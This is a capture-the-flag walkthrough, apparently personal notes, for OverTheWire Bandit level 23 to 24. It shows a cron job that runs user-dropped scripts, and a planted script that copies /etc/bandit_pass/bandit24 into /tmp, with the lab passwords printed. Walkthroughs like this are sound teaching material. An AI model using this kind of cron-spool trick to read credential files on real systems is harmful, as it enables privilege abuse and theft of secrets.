ssh bandit23@bandit.labs.overthewire.org -p 2220
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ ls
cronjob_bandit15_root  cronjob_bandit22  cronjob_bandit24
cronjob_bandit17_root  cronjob_bandit23  cronjob_bandit25_root
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            echo "timeout"
            timeout -s 9 60 ./$i
        fi
        echo delete $i
        rm -f ./$i
    fi
done

bandit23@bandit:mkdir /tmp/ll
bandit23@bandit:cd /tmp/ll
make file a.sh
    cat /etc/bandit_pass/bandit24 > /tmp/ll/b24
bandit23@bandit:/tmp/ll$ chmod 777 /tmp/ll
bandit23@bandit:/tmp/ll$ chmod 777 a.sh
bandit23@bandit:mv a.sh /var/spool/bandit24

bandit23@bandit:/tmp/ll$ cat b24
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ


UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ